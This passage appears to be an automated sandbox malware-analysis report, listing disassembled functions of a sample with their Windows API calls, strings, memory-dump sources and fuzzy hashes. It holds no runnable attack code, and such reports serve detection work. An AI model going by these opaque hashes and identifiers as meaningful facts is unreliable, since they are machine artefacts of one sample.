                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CrackInternet_memset
                      • String ID: |
                      • API String ID: 1413715105-2343686810
                      • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                      • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                      • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                      • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                      Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                      • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                      • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                      • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                      Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00462911
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 5b787c38dce0a59f34f90100e70d51444524b7953a2a3d92eef17530fa0b8ba8
                      • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                      • Opcode Fuzzy Hash: 5b787c38dce0a59f34f90100e70d51444524b7953a2a3d92eef17530fa0b8ba8
                      • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                      Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                      • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                      • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                      • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                      Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                        • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                        • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                      • GetWindowRect.USER32(00000000,?), ref: 00486C71
                      • GetSysColor.USER32(00000012), ref: 00486C8B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                      • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                      • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                      • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                      Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                      • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                      • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                      • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                      Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00462A22
                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                      • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                      • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                      • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                      Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                      • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                      • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                      • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                      Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                      Download Yara Rule
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • _wcscat.LIBCMT ref: 00444CB7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FullNamePath_memmove_wcscat
                      • String ID: SL
                      • API String ID: 257928180-181245872
                      • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                      • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                      • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                      • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                      Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                      • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                      • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                      • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                      Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                      • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                      • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                      • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                      Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                      • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                      • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                      • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                      Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0045C534
                        • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                        • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                        • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                      • VariantClear.OLEAUT32(?), ref: 0045C556
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$Init$ClearCopy_memmove
                      • String ID: d}K
                      • API String ID: 2932060187-3405784397
                      • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                      • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                      • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                      • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                      Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp
                      • String ID: #32770
                      • API String ID: 2292705959-463685578
                      • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                      • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                      • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                      • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                      Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                        • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                      • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                      • API String ID: 3158253471-631824599
                      • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                      • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                      • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                      • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9